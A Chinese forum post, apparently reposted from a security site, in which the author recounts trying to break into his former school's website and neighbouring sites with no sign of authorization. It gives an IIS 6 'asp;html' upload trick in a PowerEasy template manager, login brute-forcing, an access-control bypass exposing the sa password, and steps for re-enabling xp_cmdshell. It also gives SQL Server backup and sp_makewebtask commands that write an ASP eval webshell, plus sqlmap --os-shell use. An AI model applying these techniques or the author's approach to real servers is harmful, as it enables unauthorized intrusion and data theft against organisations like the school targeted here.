来源:http://bbs.ichunqiu.com/thread-9296-1-1.html?from=ch
前奏在这里,传送门:渗透纪实之母校官网不谢。
#线索中断
等我放学回家的时候 不好意思 服务器掉了 后门掉了 漏洞补了 导致内网线索断了
没错 断了 就这样断了!
#无奈继续撸旁站内网
N久搞到个后台
第一次见 powereasy 这个版本 由于是iis6.0 随便找个上传不改名的的地方上传类似1.asp;1.jpg之类的文件就能解析
仔细研究了下 在 系统设置-模板标签管理-模板管理 底部上传一个1.asp;1.html的文件就ok-
左边我圈的地方 模板名,我下载个程序研究了下路径,是这样:
根目录/Template/模板名/binghe.asp;binghe.html
这里就是
***.com/Template/海洋之星模板方案/1.asp;1.html
很容易的拿到了shell
很容易的提权
是个内网,转发,然后就没有然后了,给你两张图自己体会
#不能放弃,但何时是个头?
为什么还要拿旁站,因为上次拿下的太卡了 进不去服务器 无法内网渗透
目标:http://www.********.com
先来张图
但是不好意思 这是半年前的菜刀缓存,现在已经掉了,想拿回来进内网
人老了啊,就好忘事 忘了怎么拿的了 主页逛了半天 没发现注入啥的 这个小站你还指望什么xss打管理?几年登陆一次
找到个博客的二级目录
注册个用户进去 没有管理权限 于是乎收集原博客用户 着手爆破
我很心痛 这密码。。。
文件管理各种截断 各种潜规则测试无果 结论 :这个后台并无卵用(大牛可以试试)
接着发现几个都是二级目录先看OA
小菜见识短浅 不曾见过这种 更别说漏洞什么的
学习了乌云大牛的逻辑漏洞,判断出这里确实可以用于爆破用户名,存在的用户名和不存在的用户名 脚本给的response不一样,经测试 admin一定是存在的
用burp枚举密码喽,因为这里没验证嘛,密码判断出是admin,登录试试
嗯? 随便一个密码试试,这样子
什么鬼?密码正确还不给进去 难道。。。可能限制了ip啥的 或者是什么新的技术 小菜惭愧
后来转来转去竟然有越权漏洞
这个
和这个
sa密码出来了 由于是内网 直连不行 试着在sql执行池里执行几个语句 哇擦 没有回显。
执行
[AppleScript]纯文本查看复制代码
exec master..xp_cmdshell 'ver'
显示错误
恢复一下xp_cmdshell
[AppleScript]纯文本查看复制代码
1
2EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'declare @o int
sp_addextendedproc 'xp_cmdshell','xpsql70.dll'
再执行
[AppleScript]纯文本查看复制代码
exec master..xp_cmdshell 'ver'
这次不显错了 说明语句已经运行 没有回显而已
在菜刀缓存里面得到网站绝对路径 尝试echo写shell
[AppleScript]纯文本查看复制代码
exec master..xp_cmdshell 'echo"123">e:\inetpub\wwwroot\oa\cs\1.asp'
访问无果 什么鬼? 难道管理员上次发现被黑 换了服务器?
来利用他这个执行错误就报错的特性判断目录存在
[AppleScript]纯文本查看复制代码
exec master.dbo.xp_subdirs 'e:\binghesec\';//测试一个不存在的目录
果然报错
[AppleScript]纯文本查看复制代码
exec master.dbo.xp_subdirs 'e:\inetpub\wwwroot\oa\';//测试原根目录
不报错。。
这我就不明白了 什么鬼?? !!!!
再试试备份法
[AppleScript]纯文本查看复制代码
alter database mastersetRECOVERY FULL--
create table cmd(aimage)--
backuplogmastertodisk='c:\cmd1'withinit--
insertintocmd(a)values(0x3C256576616C20726571756573742822612229253E)--
backuplog[northwind]todisk='e:\inetpub\wwwroot\oa\1.asp'--
drop table cmd--
0x3C256576616C20726571756573742822612229253E是hex的<%eval request(“a”)%>
再试试访问1.asp,同样是fuck the dog,404,sa 都搞不定 我也是醉了
以下是mssql存储过程写文件 都没成功
[AppleScript]纯文本查看复制代码
1
2
3
4
5
6exec master.dbo.xp_subdirs 'c:\www\';
exec sp_makewebtask 'c:\www\hack.asp','select''<%execute(request("SB"))%>'' '
declare @o int,@f int,@t int,@ret int
exec sp_oacreate 'scripting.filesystemobject',@o out
exec sp_oamethod @o,'createtextfile',@f out,'c:\testing.txt',1
exec @ret=sp_oamethod @f,'writeline',NULL,<>
看来我得放弃这里了
再回到OA,看了半天没什么进展,望着主页发呆,随手习惯性输入‘or’=’or’ , 点登陆竟然没反应 竟然不提示不存在该用户 很明显的注入啦 抓个包 丢sqlmap
sqlmap -r '/tmp/log.txt'
–is-dba返回yes 来–os-shell,结果令我失望
注意看我圈的地方 说明取得不到回显 这对我们获得信息很不利
大牛说在os-shell无回显的情况下,写一个cmd命令 下面这里选n,命令其实已经运行了
执行echo写个shell到根目录 试试访问 也不行
直接cmd不行 那咱来sql-shell自己执行试试 还是不行
百般无奈 退而求其次 跑数据 进后台。
竟然是这样,谁能告诉我为什么sa竟然跑不出数据??
尝试编码 —hex 和—no-cast 也是不行
说到这里 我已经什么都不想说了 给我根绳子吧 结实点的!
#结语
说了这么多就是没搞下!还得多学习!
未完待续,下篇终结 ,有些知识点还是可以看看的哦。
网友评论